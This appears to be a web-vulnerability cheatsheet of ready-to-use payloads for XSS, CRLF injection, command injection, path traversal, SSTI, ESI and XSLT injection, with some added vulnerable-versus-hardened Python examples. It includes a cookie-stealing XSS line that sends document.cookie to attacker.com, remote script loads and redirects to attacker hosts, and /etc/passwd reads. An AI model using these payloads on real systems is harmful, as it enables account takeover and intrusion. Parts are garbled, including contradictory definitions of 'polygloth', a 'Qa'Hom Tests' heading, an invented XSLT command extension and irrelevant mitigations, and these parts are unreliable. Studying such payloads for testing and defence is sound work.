Web Vulnerabilities - PoCs and Polygloths CheatSheet
Polygloths list
{{7*7}}[7*7]
1;sleep${IFS}9;#${IFS}';sleep${IFS}9;#${IFS}";sleep${IFS}9;#${IFS}
/*$(sleep 5)`sleep 5``*/-sleep(5)-'/*$(sleep 5)`sleep 5` #*/-sleep(5)||'"||sleep(5)||"/*`*/
%0d%0aLocation:%20http://attacker.com
%3f%0d%0aLocation:%0d%0aContent-Type:text/html%0d%0aX-XSS-Protection%3a0%0d%0a%0d%0a%3Cscript%3Ealert%28document.domain%29%3C/script%3E
%3f%0D%0ALocation://x:1%0D%0AContent-Type:text/html%0D%0AX-XSS-Protection%3a0%0D%0A%0D%0A%3Cscript%3Ealert(document.domain)%3C/script%3E
%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aContent-Type:%20text/html%0d%0aContent-Length:%2025%0d%0a%0d%0a%3Cscript%3Ealert(1)%3C/script%3E
<br><b><h1>THIS IS AN INJECTED TITLE </h1>
/etc/passwd
../../../../../../etc/hosts
..\..\..\..\..\..\etc/hosts
/etc/hostname
../../../../../../etc/hosts
C:/windows/system32/drivers/etc/hosts
../../../../../../windows/system32/drivers/etc/hosts
..\..\..\..\..\..\windows/system32/drivers/etc/hosts
http://asdasdasdasd.burpcollab.com/mal.php
\\asdasdasdasd.burpcollab.com/mal.php
www.whitelisted.com
www.whitelisted.com.evil.com
https://google.com
//google.com
javascript:alert(1)
(\\w*)+$
([a-zA-Z]+)*$
((a+)+)+$
<!--#echo var="DATE_LOCAL" --><!--#exec cmd="ls" --><esi:include src=http://attacker.com/>x=<esi:assign name="var1" value="'cript'"/><s<esi:vars name="$(var1)"/>>alert(/Chrome%20XSS%20filter%20bypass/);</s<esi:vars name="$(var1)"/>>
{{7*7}}${7*7}<%= 7*7 %>${{7*7}}#{7*7}${{<%[%'"}}%\
<xsl:value-of select="system-property('xsl:version')" /><esi:include src="http://10.10.10.10/data/news.xml" stylesheet="http://10.10.10.10//news_template.xsl"></esi:include>
" onclick=alert() a="
'"><img src=x onerror=alert(1) />
javascript:alert()
javascript:"/*'/*`/*--></noscript></title></textarea></style></template></noembed></script><html \" onmouseover=/*<svg/*/onload=alert()//>
-->'"/></sCript><deTailS open x=">" ontoggle=(co\u006efirm)``>
">><marquee><img src=x onerror=confirm(1)></marquee>" ></plaintext\></|\><plaintext/onmouseover=prompt(1) ><script>prompt(1)</script>@gmail.com<isindex formaction=javascript:alert(/XSS/) type=submit>'-->" ></script><script>alert(1)</script>"><img/id="confirm( 1)"/alt="/"src="/"onerror=eval(id&%23x29;>'"><img src="http: //i.imgur.com/P8mL8.jpg">
" onclick=alert(1)//<button ‘ onclick=alert(1)//> */ alert(1)//
';alert(String.fromCharCode(88,83,83))//';alert(String. fromCharCode(88,83,83))//";alert(String.fromCharCode (88,83,83))//";alert(String.fromCharCode(88,83,83))//-- ></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83)) </SCRIPT>
Client Side Template Injection
Basic Tests
{{7*7}}
[7*7]
Polygloths
A polygloth in this cheatsheet is not a polyglot file: it is a single payload that concatenates the basic tests for one vulnerability class, so that one injection exercises every syntax at once. For CSTI the polygloth below joins the {{7*7}} probe (AngularJS, Vue) with the [7*7] probe (Mavo). Look at how the string comes back: if either expression has been replaced by 49, the input is being evaluated by a client-side template engine, and the half that survived unchanged tells you which syntax that engine ignores.
{{7*7}}[7*7]
Command Injection
Basic Tests
;ls
||ls;
|ls;
&&ls;
&ls;
%0Als
`ls`
$(ls)
Polygloths
1;sleep${IFS}9;#${IFS}';sleep${IFS}9;#${IFS}";sleep${IFS}9;#${IFS}
/*$(sleep 5)`sleep 5``*/-sleep(5)-'/*$(sleep 5)`sleep 5` #*/-sleep(5)||'"||sleep(5)||"/*`*/
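The first polygloth above works because each of its three copies of the command sits in a different quoting context: whichever context the vulnerable program used, one copy breaks out, and the ;# that follows comments out the rest of the line, including the stray closing quote. The Python below is an added example, not code from the original page: it generalises the polygloth to any command (the page uses sleep${IFS}9; here the injected command is echo INJECTED so the result is visible in output rather than in timing), runs it through three hypothetical vulnerable command templates, and contrasts them with an argv-based call that cannot be injected. It needs a POSIX /bin/sh.

```python
import subprocess

# Hypothetical vulnerable programs: each splices user input into a command string in a
# different quoting context and hands the result to the shell.
CONTEXTS = {
    "unquoted": "echo INPUT",
    "single_quoted": "echo 'INPUT'",
    "double_quoted": 'echo "INPUT"',
}


def polygloth(cmd):
    """Wrap CMD in the cheatsheet's three-context command-injection polygloth.

    Spaces become ${IFS} so the payload survives filters that reject whitespace.
    Copy one is for an unquoted context, copy two closes a single quote first,
    copy three closes a double quote; the ';#' after each copy comments out the
    remainder of the original command line, including the now-unbalanced quotes.
    """
    cmd = cmd.replace(" ", "${IFS}")
    return "1;" + cmd + ";#${IFS}';" + cmd + ";#${IFS}\";" + cmd + ";#${IFS}"


def run_vulnerable(template, user_input):
    """String substitution plus shell=True: the injectable pattern."""
    command = template.replace("INPUT", user_input)
    return subprocess.run(command, shell=True, capture_output=True, text=True).stdout


def run_hardened(user_input):
    """argv list and no shell: the input is a single argument to echo and is never
    parsed as shell syntax, so it comes back verbatim on one line."""
    return subprocess.run(["echo", user_input], capture_output=True, text=True).stdout


def injected(output, marker="INJECTED"):
    """True only if the marker was printed by the injected command, i.e. as a line of
    its own; a literal echo of the payload prints it glued to ';#' and other text."""
    return marker in output.splitlines()


def demo():
    """Run the polygloth through every context; only the hardened variant stays False."""
    payload = polygloth("echo INJECTED")
    results = {name: injected(run_vulnerable(tpl, payload)) for name, tpl in CONTEXTS.items()}
    results["hardened"] = injected(run_hardened(payload))
    return results


if __name__ == "__main__":
    for name, hit in demo().items():
        print(f"{name:14s} injected={hit}")
```

When nothing is reflected in the response, keep the page's sleep${IFS}9 version and compare response times instead of looking for a marker; the quoting logic is the same.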
CRLF
Basic Tests
CRLF injection happens when user input is copied into an HTTP response header without stripping carriage return and line feed characters (%0D%0A, \r\n). One CRLF terminates the current header and lets the attacker append headers of his own (a Location or Set-Cookie header, for example); a double CRLF terminates the header block, so everything after it is treated as response body, or even as a second, fully attacker-controlled response (HTTP response splitting). The consequences are open redirect, session fixation, cache poisoning and reflected XSS with an attacker-chosen Content-Type.
To test, send the payloads below in any parameter whose value ends up in a response header (redirect targets, cookie values, custom headers) and read the raw response: an extra header line, a body shorter than expected or a second status line means the CRLF was not neutralised. Example request:
GET /vulnerable.php?next=/home%0D%0AInjectedHeader:%20injected HTTP/1.1
Host: example.com
A vulnerable server answers with a header named InjectedHeader. Most current servers and frameworks refuse or strip CR and LF in header values, so also check whether the application URL-decodes the value a second time before using it.
Remediation: reject (or percent-encode) CR, LF and NUL in any value that is written into a header, and never assemble response headers by string concatenation.
%0d%0aLocation:%20http://attacker.com
%3f%0d%0aLocation:%0d%0aContent-Type:text/html%0d%0aX-XSS-Protection%3a0%0d%0a%0d%0a%3Cscript%3Ealert%28document.domain%29%3C/script%3E
%3f%0D%0ALocation://x:1%0D%0AContent-Type:text/html%0D%0AX-XSS-Protection%3a0%0D%0A%0D%0A%3Cscript%3Ealert(document.domain)%3C/script%3E
%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aContent-Type:%20text/html%0d%0aContent-Length:%2025%0d%0a%0d%0a%3Cscript%3Ealert(1)%3C/script%3E
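The payloads above only have an effect against a handler that writes the decoded value straight into a header line. The Python below is an added example and not code from the original page: it builds a redirect response the injectable way and a hardened way, URL-decodes the first and the last payload above into a hypothetical next parameter, and parses the result the way a client would, to show the second Location header and the smuggled second response.

```python
from urllib.parse import unquote


def naive_redirect_response(next_url):
    """Raw 302 built by string formatting: whatever is in next_url lands in the header block."""
    return (
        "HTTP/1.1 302 Found\r\n"
        f"Location: {next_url}\r\n"
        "Content-Length: 0\r\n"
        "\r\n"
    )


def hardened_redirect_response(next_url):
    """Same response, but a value carrying CR, LF or NUL is refused, so the header it is
    written into cannot be terminated early."""
    if any(c in next_url for c in "\r\n\0"):
        raise ValueError("CR/LF in header value")
    return naive_redirect_response(next_url)


def hardened_rejects(next_url):
    """True if the hardened builder refuses the value."""
    try:
        hardened_redirect_response(next_url)
    except ValueError:
        return True
    return False


def parse_response(raw):
    """Split a raw response as a client does: status line, (name, value) headers, body.
    Everything after the first blank line is body, whatever it looks like."""
    head, _, body = raw.partition("\r\n\r\n")
    status, *header_lines = head.split("\r\n")
    headers = []
    for line in header_lines:
        name, _, value = line.partition(":")
        headers.append((name.strip().lower(), value.strip()))
    return status, headers, body


def locations(raw):
    """All Location header values: more than one means a header was injected."""
    return [v for n, v in parse_response(raw)[1] if n == "location"]


def smuggled_response(raw):
    """If the body starts with a status line, the payload split one response into two."""
    body = parse_response(raw)[2]
    return body if body.startswith("HTTP/1.") else None


# Constructed input: a legitimate next=/home value with two of the cheatsheet payloads
# appended, after the URL decoding the server performs on the query string.
PAYLOAD_HEADER = "/home" + unquote("%0d%0aLocation:%20http://attacker.com")
PAYLOAD_SPLIT = "/home" + unquote(
    "%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0a"
    "Content-Type:%20text/html%0d%0aContent-Length:%2025%0d%0a%0d%0a"
    "%3Cscript%3Ealert(1)%3C/script%3E"
)

if __name__ == "__main__":
    print(locations(naive_redirect_response(PAYLOAD_HEADER)))
    print(repr(smuggled_response(naive_redirect_response(PAYLOAD_SPLIT))))
    print(hardened_rejects(PAYLOAD_HEADER), hardened_rejects("/home"))
```

The split payload carries its own Content-Length: 0 so the first response ends immediately and the attacker's HTTP/1.1 200 block is what a browser or cache parses next; that is the cache-poisoning angle.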
Dangling Markup
Basic Tests
Check whether HTML you inject is rendered rather than displayed as text. The payload below, sent in any reflected parameter, is harmless and easy to spot: if a bold heading appears in the page, the application does not encode < and > on output. Unencoded markup is the precondition for two follow-ups. One is XSS. The other is dangling markup: when script execution is blocked, for example by CSP or a filter, an injected tag that is deliberately left unclosed makes the browser swallow the rest of the page, up to the next matching quote, into an attribute such as an image source, so the content between the injection point and that quote (CSRF tokens, links carrying secrets) is sent to the attacker's server as part of a request URL.
The fix is the same as for XSS: HTML-encode user data on output according to the context it lands in, and deploy a CSP that restricts where images, forms and other fetching elements may point.
<br><b><h1>THIS IS AN INJECTED TITLE </h1>
File Inclusion/Path Traversal
Basic Tests
Path traversal: a parameter that names a file is manipulated with ../ sequences (..\ on Windows) or an absolute path so that the application reads a file outside the directory it meant to serve, such as application source, configuration or /etc/passwd.
GET /vulnerable.php?page=../../../../etc/passwd HTTP/1.1
Host: example.com
Local File Inclusion (LFI): the same thing, but the file is handed to an include/require-style function instead of just being read, so anything the attacker can get onto the disk (log entries, session files, uploads) may be executed as code.
GET /vulnerable.php?page=/etc/passwd HTTP/1.1
Host: example.com
Remote File Inclusion (RFI): the include accepts a URL, so the attacker hosts the code himself. The two Burp Collaborator payloads below are for this case: a DNS or HTTP hit on the collaborator proves that the server fetched the URL even when nothing is reflected. The \\host\path form is for Windows targets, which try it as a UNC (SMB) path.
GET /vulnerable.php?url=http://attacker.com/malicious.php HTTP/1.1
Host: example.com
Prevention:
- Do not pass user input to file paths or include statements; map a small set of allowed values to fixed file names.
- If a path must be accepted, resolve it (normalise and follow symlinks) and check that the result is still inside the intended directory.
- Disable remote includes in the interpreter (allow_url_include=Off in PHP) and run the application with read access only to the files it needs.
/etc/passwd
../../../../../../etc/hosts
..\..\..\..\..\..\etc/hosts
/etc/hostname
../../../../../../etc/hosts
C:/windows/system32/drivers/etc/hosts
../../../../../../windows/system32/drivers/etc/hosts
..\..\..\..\..\..\windows/system32/drivers/etc/hosts
http://asdasdasdasd.burpcollab.com/mal.php
\\asdasdasdasd.burpcollab.com/mal.php
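How the traversal payloads above fare against a naive and a hardened path check, as an added example that is not code from the page. BASE_DIR is a hypothetical document root; none of the files need to exist for the resolution logic to be exercised.

```python
import os

# Hypothetical document root that a page=... parameter is meant to stay inside.
BASE_DIR = "/var/www/app/pages"


def naive_resolve(user_path):
    """os.path.join discards BASE_DIR when the second argument is absolute, and normpath
    happily walks '..' out of it: both payload styles above succeed against this."""
    return os.path.normpath(os.path.join(BASE_DIR, user_path))


def safe_resolve(user_path):
    """Resolve first, compare second. realpath collapses '..' and follows symlinks, so a
    link inside the root that points outside is caught too; commonpath then requires the
    result to be under the (also resolved) root, which a plain startswith would get wrong
    for a sibling directory such as /var/www/app/pages-old."""
    root = os.path.realpath(BASE_DIR)
    candidate = os.path.realpath(os.path.join(root, user_path))
    if os.path.commonpath([root, candidate]) != root:
        raise ValueError(f"path escapes document root: {user_path!r}")
    return candidate


def classify(payloads):
    """Map each payload to 'blocked' or to the path safe_resolve would allow."""
    verdicts = {}
    for p in payloads:
        try:
            verdicts[p] = safe_resolve(p)
        except ValueError:
            verdicts[p] = "blocked"
    return verdicts


# The traversal payloads from the cheatsheet plus one legitimate page name.
PAYLOADS = [
    "/etc/passwd",
    "../../../../../../etc/hosts",
    "..\\..\\..\\..\\..\\..\\etc/hosts",
    "/etc/hostname",
    "about.html",
]

if __name__ == "__main__":
    for p in PAYLOADS:
        print(f"{p!r:40s} naive={naive_resolve(p)!r:28s} safe={classify([p])[p]!r}")
```

On a POSIX host the backslash payload is allowed by the safe resolver, correctly so: there the backslash is an ordinary filename character and the path never leaves the root. That is why the cheatsheet carries both separator styles; the ..\ form is the one that matters against Windows targets.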
Open Redirect / Server Side Request Forgery
Basic Tests
www.whitelisted.com
www.whitelisted.com.evil.com
https://google.com
//google.com
javascript:alert(1)
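An added example, not from the original page, of why the payloads above defeat prefix and substring checks and how to validate a redirect or fetch target properly: parse first, require an explicit http(s) scheme, and compare the host exactly against an allowlist (a hypothetical one here). The credentials form https://www.whitelisted.com@evil.com/ and the backslash form /\evil.com are not on the page; they are included as further cases the same check must cover. For SSRF, apply the same function to the outbound URL and additionally resolve the host and reject private and link-local ranges, which this offline example does not do.

```python
from urllib.parse import urlsplit

# Hypothetical allowlist of redirect / fetch targets.
ALLOWED_HOSTS = {"www.whitelisted.com"}


def naive_is_allowed(url):
    """Prefix checks of the kind the payloads above are built to defeat: an allowlisted
    host as a string prefix, or 'starts with /' as a proxy for 'same origin'."""
    return url.startswith("www.whitelisted.com") or url.startswith("/")


def is_allowed(url):
    """Parse, then decide on the parsed parts.

    - A relative path is fine, but only a real one: '//host' parses with a netloc and so
      never reaches the relative branch; '/\\host' is rejected because browsers treat the
      backslash as a slash and turn it into a protocol-relative URL.
    - Anything with a scheme must be http or https, which drops javascript:, data:, file:.
    - The host is compared exactly against the allowlist via .hostname, so credentials
      (user@), ports and upper-case letters cannot disguise it.
    """
    parts = urlsplit(url)
    if not parts.scheme and not parts.netloc:
        return parts.path.startswith("/") and not parts.path.startswith("/\\")
    if parts.scheme not in ("http", "https"):
        return False
    return parts.hostname in ALLOWED_HOSTS


def evaluate(urls):
    """Side-by-side (naive, strict) verdicts for a list of candidate targets."""
    return {u: (naive_is_allowed(u), is_allowed(u)) for u in urls}


# The payloads from the cheatsheet, plus a legitimate absolute target, a relative path
# and two bypass forms not on the page.
CANDIDATES = [
    "www.whitelisted.com",
    "www.whitelisted.com.evil.com",
    "https://google.com",
    "//google.com",
    "javascript:alert(1)",
    "https://www.whitelisted.com/login",
    "/account",
    "https://www.whitelisted.com@evil.com/",
    "/\\evil.com",
]

if __name__ == "__main__":
    for url, (naive, strict) in evaluate(CANDIDATES).items():
        print(f"{url:42s} naive={naive!s:5s} strict={strict}")
```

Note that a bare www.whitelisted.com without a scheme is rejected by the strict check: as a redirect target it is a relative path, not the allowlisted host, which is exactly the confusion the naive prefix check falls for.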
ReDoS
Basic Tests
(\\w*)+$
([a-zA-Z]+)*$
((a+)+)+$
Server Side Inclusion/Edge Side Inclusion
Basic Tests
<!--#echo var="DATE_LOCAL" -->
<!--#exec cmd="ls" -->
<esi:include src=http://attacker.com/>
x=<esi:assign name="var1" value="'cript'"/><s<esi:vars name="$(var1)"/>>alert(/Chrome%20XSS%20filter%20bypass/);</s<esi:vars name="$(var1)"/>>
Polygloths
<!--#echo var="DATE_LOCAL" --><!--#exec cmd="ls" --><esi:include src=http://attacker.com/>x=<esi:assign name="var1" value="'cript'"/><s<esi:vars name="$(var1)"/>>alert(/Chrome%20XSS%20filter%20bypass/);</s<esi:vars name="$(var1)"/>>
Server Side Request Forgery
The same tests used for Open Redirect can be used here.
Server Side Template Injection
Basic Tests
${{<%[%'"}}%\
{{7*7}}
${7*7}
<%= 7*7 %>
${{7*7}}
#{7*7}
Polygloths
{{7*7}}${7*7}<%= 7*7 %>${{7*7}}#{7*7}${{<%[%'"}}%\
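Reading the SSTI polygloth back out of a response is the fiddly part, because the probes overlap as text (${{7*7}} contains {{7*7}}, so a substring search misattributes results). The Python below is an added example, not code from the page: it walks the reflected fragment probe by probe, in the order the polygloth sends them, and reports which ones were evaluated, including the partial case where Jinja2 turns ${{7*7}} into $49. The two sample responses are constructed, modelled on how Jinja2 and ERB treat these tokens.

```python
# The SSTI polygloth from the cheatsheet and its component probes, in order.
PROBES = ["{{7*7}}", "${7*7}", "<%= 7*7 %>", "${{7*7}}", "#{7*7}"]
POLYGLOTH = "".join(PROBES)


def triage(reflected):
    """Classify each probe from the fragment of the response where the polygloth came back.

    The fragment is consumed left to right. A probe that is not reflected literally owns
    everything up to the next literally reflected probe, and that slice is its rendering.

    Verdicts: 'reflected', 'evaluated:<rendering>' (the rendering contains 49, possibly
    with leftover characters such as '$49'), 'stripped' (nothing came back) or
    'changed:<rendering>' (something else, e.g. a filter rewrote it).
    """
    verdicts, pos = {}, 0
    for idx, probe in enumerate(PROBES):
        if reflected.startswith(probe, pos):
            verdicts[probe] = "reflected"
            pos += len(probe)
            continue
        end = len(reflected)
        for later in PROBES[idx + 1:]:
            hit = reflected.find(later, pos)
            if hit != -1:
                end = min(end, hit)
        rendering = reflected[pos:end]
        if "49" in rendering:
            verdicts[probe] = f"evaluated:{rendering}"
        elif rendering == "":
            verdicts[probe] = "stripped"
        else:
            verdicts[probe] = f"changed:{rendering}"
        pos = end
    return verdicts


def evaluated_probes(reflected):
    """Just the probes whose arithmetic was executed."""
    return [p for p, v in triage(reflected).items() if v.startswith("evaluated")]


# Constructed sample responses, modelled on how two engines treat the tokens: Jinja2
# evaluates {{ }} (so ${{7*7}} comes back as $49) and leaves the rest alone; ERB only
# evaluates <%= %> and passes #{7*7} through as text.
JINJA2_LIKE = "49${7*7}<%= 7*7 %>$49#{7*7}"
ERB_LIKE = "{{7*7}}${7*7}49${{7*7}}#{7*7}"

if __name__ == "__main__":
    for name, sample in (("jinja2-like", JINJA2_LIKE), ("erb-like", ERB_LIKE), ("inert", POLYGLOTH)):
        print(name, triage(sample))
```

Which syntax evaluated narrows the engine down; the remaining candidates are then separated with engine-specific probes, which is the next step of the SSTI methodology rather than of this cheatsheet.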
XSLT Server Side Injection
Qa'Hom Tests
Test 1: XSLT Server Side Injection
Description
This test checks for XSLT Server Side Injection vulnerabilities by injecting malicious code into an XSLT stylesheet.
Steps
- Identify the target application that uses XSLT transformations.
- Locate the input parameter or field that is used in the XSLT transformation.
- Craft a payload that includes the malicious XSLT code.
- Inject the payload into the input parameter or field.
- Observe the response from the server.
- If the response contains the output of the injected XSLT code, the application is vulnerable to XSLT Server Side Injection.
Example Payload
<?xml version="1.0" encoding="UTF-8"?>
<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt" xmlns:user="http://mycompany.com/mynamespace">
<xsl:output method="html" version="1.0" encoding="UTF-8" indent="yes"/>
<xsl:template match="/">
<xsl:variable name="cmd">
<xsl:value-of select="user:executeCommand('whoami')"/>
</xsl:variable>
<html>
<body>
<h1>XSLT Server Side Injection</h1>
<p>Output: <xsl:value-of select="$cmd"/></p>
</body>
</html>
</xsl:template>
</xsl:stylesheet>
Mitigation
To mitigate XSLT Server Side Injection vulnerabilities, follow these best practices:
- Validate and sanitize user input before using it in XSLT transformations.
- Use parameterized queries or prepared statements to prevent code injection.
- Limit the privileges of the user account used by the XSLT transformation engine.
- Regularly update and patch the XSLT transformation engine to fix any known vulnerabilities.
Test 2: XSLT Server Side Injection (Blind)
Description
This test checks for blind XSLT Server Side Injection vulnerabilities by injecting malicious code into an XSLT stylesheet and observing the response from the server.
Steps
- Identify the target application that uses XSLT transformations.
- Locate the input parameter or field that is used in the XSLT transformation.
- Craft a payload that includes the malicious XSLT code.
- Inject the payload into the input parameter or field.
- Observe the response from the server.
- If the response changes in a way that indicates the injected XSLT code was executed, the application is vulnerable to blind XSLT Server Side Injection.
Example Payload
```markup
<?xml version="1.0" encoding="UTF-8"?>
<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt" xmlns:user="http://mycompany.com/mynamespace">
  <xsl:output method="html" version="1.0" encoding="UTF-8" indent="yes"/>
  <xsl:template match="/">
    <xsl:variable name="cmd">
      <xsl:value-of select="user:executeCommand('whoami')"/>
    </xsl:variable>
    <html>
      <body>
        <h1>XSLT Server Side Injection (Blind)</h1>
        <p>Output: <xsl:value-of select="$cmd"/></p>
      </body>
    </html>
  </xsl:template>
</xsl:stylesheet>
```
Mitigation
To mitigate blind XSLT Server Side Injection vulnerabilities, follow the same best practices as for regular XSLT Server Side Injection. Additionally, consider implementing the following measures:
- Monitor and analyze server logs for any suspicious behavior.
- Implement Web Application Firewalls (WAFs) to detect and block malicious XSLT code.
- Regularly perform security assessments and penetration tests to identify and fix vulnerabilities.
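The defect that Test 1 and Test 2 look for, and the parameterised fix from the mitigation list, side by side. This is an added example, not code from the original page or from any project: `render_unsafe` splices user input into the stylesheet text, `render_safe` passes it as an `xsl:param`; the function names and the sample document are this example's own, and it assumes lxml is installed.

```python
from lxml import etree

XSL_NS = "http://www.w3.org/1999/XSL/Transform"

# Constructed input document for the transformation.
DOC = etree.fromstring("<news><item>Hello</item></news>")

# The page's basic test probe: it yields the processor's XSLT version only
# when the processor interprets it as stylesheet markup.
PROBE = "<xsl:value-of select=\"system-property('xsl:version')\"/>"

# Deny document()/file access for both variants; this limits what an injected
# stylesheet can reach, but it does not stop the injection itself.
NO_ACCESS = etree.XSLTAccessControl.DENY_ALL


def render_unsafe(title: str) -> str:
    """Vulnerable pattern: the user-supplied title is spliced into the
    stylesheet source, so XSLT markup inside it becomes part of the program."""
    xsl = f"""<xsl:stylesheet version="1.0" xmlns:xsl="{XSL_NS}">
  <xsl:output method="text"/>
  <xsl:template match="/">{title}: <xsl:value-of select="//item"/></xsl:template>
</xsl:stylesheet>"""
    transform = etree.XSLT(etree.fromstring(xsl), access_control=NO_ACCESS)
    return str(transform(DOC))


def render_safe(title: str) -> str:
    """Hardened pattern: the stylesheet is a fixed constant and user data enters
    only through an xsl:param bound with strparam(), i.e. as a string value."""
    xsl = f"""<xsl:stylesheet version="1.0" xmlns:xsl="{XSL_NS}">
  <xsl:output method="text"/>
  <xsl:param name="title"/>
  <xsl:template match="/"><xsl:value-of select="$title"/>: <xsl:value-of select="//item"/></xsl:template>
</xsl:stylesheet>"""
    transform = etree.XSLT(etree.fromstring(xsl), access_control=NO_ACCESS)
    return str(transform(DOC, title=etree.XSLT.strparam(title)))


def probe_was_evaluated(output: str) -> bool:
    """The check behind the page's test: the probe ran if its markup is gone
    from the response and the version value took its place."""
    return "system-property" not in output
```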
```markup
<xsl:value-of select="system-property('xsl:version')" />
<esi:include src="http://10.10.10.10/data/news.xml" stylesheet="http://10.10.10.10//news_template.xsl"></esi:include>
```
Polygloths
Polygloths are files that can be interpreted as multiple file types depending on the context in which they are executed. They are often used in hacking to bypass security measures and gain unauthorized access to systems.
Polygloths can be created by manipulating the file's structure and content to make it appear as different file types. This can be achieved by adding specific headers, changing file extensions, or embedding different file formats within the same file.
By using polygloths, hackers can trick security systems into treating the file as harmless, while it actually contains malicious code or exploits. This allows them to bypass security checks and execute their attacks without detection.
Polygloths can be used in various hacking scenarios, such as phishing attacks, malware distribution, or remote code execution. They can be delivered through different channels, including email attachments, malicious websites, or compromised software.
To protect against polygloths, it is important to have robust security measures in place. This includes using up-to-date antivirus software, implementing strong access controls, and educating users about the risks of opening unknown files.
By understanding the concept of polygloths and how they can be used in hacking, security professionals can better defend against these types of attacks and mitigate the risks they pose to systems and data.
```markup
<xsl:value-of select="system-property('xsl:version')" /><esi:include src="http://10.10.10.10/data/news.xml" stylesheet="http://10.10.10.10//news_template.xsl"></esi:include>
```
XSS
Basic Tests
1. Alert: `<script>alert(1)</script>`
2. Image source: `<img src="x" onerror="alert(1)">`
3. Input value: `<input type="text" value="<script>alert(1)</script>">`
4. URL parameter: `https://example.com/?q=<script>alert(1)</script>`
5. Cookie: `<script>document.location='https://attacker.com/steal.php?cookie='+document.cookie</script>`
6. Local storage: `<script>localStorage.setItem('cookie', document.cookie)</script>`
7. Document write: `<script>document.write('<script src="https://attacker.com/evil.js"></script>')</script>`
8. Button onclick: `<button onclick="alert(1)">Click me!</button>`
9. SVG: `<svg onload="alert(1)"></svg>`
10. Style attribute: `<div style="background-image: url('x'); width: expression(alert(1));">Test</div>`
11. href attribute: `<a href="javascript:alert(1)">Click me!</a>`
12. Form action: `<form action="javascript:alert(1)"><input type="submit" value="Submit"></form>`
13. Textarea: `<textarea><script>alert(1)</script></textarea>`
14. body onload: `<body onload="alert(1)">`
15. image tag: `<image src="x" onerror="alert(1)">`
16. div onmouseover: `<div onmouseover="alert(1)">Hover over me!</div>`
17. iframe tag: `<iframe src="javascript:alert(1)"></iframe>`
18. object tag: `<object data="javascript:alert(1)"></object>`
19. embed tag: `<embed src="javascript:alert(1)">`
20. audio tag: `<audio src="javascript:alert(1)"></audio>`
21. video tag: `<video src="javascript:alert(1)"></video>`
22. source tag: `<source src="javascript:alert(1)">`
23. track tag: `<track src="javascript:alert(1)">`
24. input onfocus: `<input type="text" onfocus="alert(1)">`
25. select onchange: `<select onchange="alert(1)"><option value="1">Option 1</option><option value="2">Option 2</option></select>`
26. textarea onselect: `<textarea onselect="alert(1)">Select me!</textarea>`
27. onsubmit attribute: `<form onsubmit="alert(1)"><input type="submit" value="Submit"></form>`
28. onkeydown attribute: `<input type="text" onkeydown="alert(1)">`
29. onkeyup attribute: `<input type="text" onkeyup="alert(1)">`
30. onkeypress attribute: `<input type="text" onkeypress="alert(1)">`
31. onblur attribute: `<input type="text" onblur="alert(1)">`
32. ondblclick attribute: `<button ondblclick="alert(1)">Double click me!</button>`
33. onmousedown attribute: `<button onmousedown="alert(1)">Click me!</button>`
34. onmouseup attribute: `<button onmouseup="alert(1)">Click me!</button>`
35. onmousemove attribute: `<div onmousemove="alert(1)">Move your mouse!</div>`
36. onmouseout attribute: `<div onmouseout="alert(1)">Mouse out!</div>`
37. onmouseenter attribute: `<div onmouseenter="alert(1)">Mouse enter!</div>`
38. onmouseleave attribute: `<div onmouseleave="alert(1)">Mouse leave!</div>`
39. oncontextmenu attribute: `<div oncontextmenu="alert(1)">Right click me!</div>`
40. onresize attribute: `<body onresize="alert(1)">`
41. onscroll attribute: `<body onscroll="alert(1)">`
42. onunload attribute: `<body onunload="alert(1)">`
43. onhashchange attribute: `<body onhashchange="alert(1)">`
44. onmessage attribute: `<body onmessage="alert(1)">`
45. onbeforeunload attribute: `<body onbeforeunload="alert(1)">`
46. onoffline attribute: `<body onoffline="alert(1)">`
47. ononline attribute: `<body ononline="alert(1)">`
48. onpagehide attribute: `<body onpagehide="alert(1)">`
49. onpageshow attribute: `<body onpageshow="alert(1)">`
50. onpopstate attribute: `<body onpopstate="alert(1)">`
51. onstorage attribute: `<body onstorage="alert(1)">`
52. onbeforeprint attribute: `<body onbeforeprint="alert(1)">`
53. onafterprint attribute: `<body onafterprint="alert(1)">`
54. onbeforecut attribute: `<input type="text" onbeforecut="alert(1)">`
55. oncut attribute: `<input type="text" oncut="alert(1)">`
56. onbeforecopy attribute: `<input type="text" onbeforecopy="alert(1)">`
57. oncopy attribute: `<input type="text" oncopy="alert(1)">`
58. onbeforepaste attribute: `<input type="text" onbeforepaste="alert(1)">`
59. onpaste attribute: `<input type="text" onpaste="alert(1)">`
60. onsearch attribute: `<input type="search" onsearch="alert(1)">`
61. oninvalid attribute: `<input type="text" oninvalid="alert(1)">`
62. onreset attribute: `<form onreset="alert(1)"><input type="reset" value="Reset"></form>`
63. oninput attribute: `<input type="text" oninput="alert(1)">`
```markup
" onclick=alert() a="
'"><img src=x onerror=alert(1) />
javascript:alert()
```
Polygloths
Polygloths are files that can be interpreted as multiple file types depending on the context in which they are executed. This can be useful for bypassing security measures or exploiting vulnerabilities in certain systems.
Polygloths can be created by combining the syntax and structure of different file types into a single file. When executed, the file is interpreted differently depending on the software or system that is processing it.
For example, a polyglot file may appear as a harmless image file when opened in an image viewer, but when executed as a script, it can run malicious code. This can be used to trick users into opening the file, thinking it is safe, while actually executing harmful actions.
Polygloths can be used in various hacking techniques, such as:
- File Inclusion Attacks: By creating a polyglot file that can be interpreted as both an image file and a script, an attacker can exploit a file inclusion vulnerability to execute arbitrary code on a target system.
- Cross-Site Scripting (XSS): Polyglot files can be used to inject malicious code into web applications, bypassing input validation and executing arbitrary scripts in the context of the victim's browser.
- Data Exfiltration: Polyglot files can be used to hide sensitive data within seemingly harmless files, allowing an attacker to exfiltrate data without detection.
To create polygloths, hackers often leverage the differences in file format specifications and the way different software interprets them. By carefully crafting a file that conforms to multiple specifications, they can create a file that behaves differently depending on the context in which it is executed.
It is important for security professionals to be aware of polygloths and understand how they can be used in attacks. By understanding the techniques used to create and exploit polygloths, security measures can be put in place to detect and prevent their malicious use.
```markup
